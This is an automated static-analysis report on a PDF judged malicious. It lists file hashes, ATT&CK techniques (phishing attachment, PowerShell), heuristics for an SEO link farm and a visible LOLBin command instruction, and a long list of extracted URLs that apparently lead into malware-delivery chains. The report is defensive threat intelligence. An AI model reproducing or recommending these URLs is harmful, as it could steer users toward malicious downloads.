Malicious PDF — malware analysis report

Static analysis result for SHA-256 cbad100f4ec3b3e3…

MALICIOUS

PDF

145.1 KB Created: 2020-03-07 16:45:37 +02:00 Authoring application: wkhtmltopdf 0.12.1.4 (via Qt 4.8.6)
MD5: e1ad29693bf5159f19f1bb460b0a3282 SHA-1: a775d4896f9a1a8b5370986824f9e54f4d08c8ae SHA-256: cbad100f4ec3b3e32e287be086c0d41e55968e92c08aa49d167d352ccf890d2c
104 Risk Score

Malware Insights

MITRE ATT&CK
T1566.002 Spearphishing Attachment T1059.001 PowerShell T1204.002 Malicious File

The PDF document contains a large number of external links, many of which are dynamically generated and point to unrelated content, indicating a link farm or SEO abuse tactic. The presence of a 'Visible LOLBin command execution instruction' heuristic firing suggests that the document is designed to execute commands, likely to download and run further malicious payloads. The primary URL identified is http://74-123-78-154.mgwnet.com/uploads/1/3/0/7/130776517/130776517.html#signs+and+symptoms+of+asthma+exacerbation, which is presented as information about asthma symptoms.

Heuristics 4

  • Small PDF contains mass external PDF link farm critical PDF_SEO_LINK_FARM
    Small PDF contains many clickable external PDF links, mostly clustered on one host. This matches generated SEO/link-farm PDF carriers used to route users into malicious or unwanted-software delivery chains, rather than a normal document citation pattern.
  • Visible LOLBin command execution instruction high SE_LOLBIN_RUN_COMMAND
    Document contains instructions or visible command text involving Windows script/execution tools such as PowerShell, mshta, cmd, rundll32, or regsvr32
  • External URI info PDF_URI
    PDF contains an external URL action
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://74-123-78-154.mgwnet.com/uploads/1/3/0/7/130776517/130776517.html#signs+and+symptoms+of+asthma+exacerbation
    • http://www.cherylthibodeau.com/uploads/1/3/0/6/130604696/gatelovog_mamabitesixovo_kolul_womugixesutati.pdf
    • http://studiob.agency/uploads/1/3/0/4/130476447/5177399.pdf
    • http://roryward.com/uploads/1/3/0/2/130291485/resagajomuwabuk.pdf
    • http://slowgrinder.com/uploads/1/3/0/7/130739000/dedanitalovozuzodada.pdf
    • http://merryleetraum.net/uploads/1/3/0/4/130477566/e903d7cb7a.pdf
    • http://beginningbosslife.com/uploads/1/3/0/3/130323552/sosase.pdf
    • http://cupcakesandaliens.com/uploads/1/3/0/5/130588803/4930157.pdf
    • http://sorteincorporation.co.za/uploads/1/3/0/7/130776891/lojomivagozeveg-fated-palaba-lujugaxu.pdf
    • http://5-8dublinmiddle.com/uploads/1/3/0/5/130550967/bisawenafadaku.pdf
    • http://hendersonchristianoutreach.com/uploads/1/3/0/2/130291415/nusizonadewezob.pdf
    • http://www.murrayforward5.com/uploads/1/3/0/8/130813054/f08cd3ff9615.pdf
    • http://mta-sts.mail.escapeartistswartown.com/uploads/1/3/0/3/130323761/421238.pdf
    • http://mta-sts.thaisrussomano.com/uploads/1/3/0/8/130814935/vobibunadog.pdf
    • http://klawittertransitllc.com/uploads/1/3/0/6/130621209/tobanaro.pdf
    • http://romboid.pl/uploads/1/3/0/7/130739063/8195655.pdf
    • http://experiencegrace.net/uploads/1/3/0/4/130490833/nuwukipepa.pdf
    • http://www.dtboost.com/uploads/1/3/0/7/130738814/9165591.pdf
    • http://derrickgardnerphotography.com/uploads/1/3/0/3/130379244/685735.pdf
    • http://www.basicbitcheshealtheearth.com/uploads/1/3/0/7/130740558/panuruxa_fifuropap.pdf
    • http://betterbartlett.org/uploads/1/3/0/6/130604878/beboduralop.pdf
    • http://imgmfr.com/uploads/1/3/0/5/130545260/balopig-wunaretot.pdf
    • http://www.greaterenochgrove.com/uploads/1/3/0/4/130488884/bd09bbe01323.pdf
    • http://coloniakiters.com/uploads/1/3/0/2/130289427/mezujakakope.pdf
    • http://fairdebonaire.com/uploads/1/3/0/6/130621176/4514398.pdf
    • http://blufftonchurch.org/uploads/1/3/0/5/130539215/f5a2d7.pdf
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/rights/

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
font_00_sfnt_off0001eb18.bin
6847ba6c011e8c77e43bf84a3e160ff344337320eed7abb66866723bf5d39f58		 pdf-font-stream PDF embedded font (sfnt) at offset 0x1EB18 10968 bytes
font_01_sfnt_off0002116f.bin
af5d1abf438d1ed0dbbe213e31909cce2043c4a5bbaf1d24522a800f03f33df6		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2116F 3620 bytes
font_02_sfnt_off00021e12.bin
3714710c508d524414e0dd842408b5ef2283e7cac44fc843bc37d9c0b7b80784		 pdf-font-stream PDF embedded font (sfnt) at offset 0x21E12 16320 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.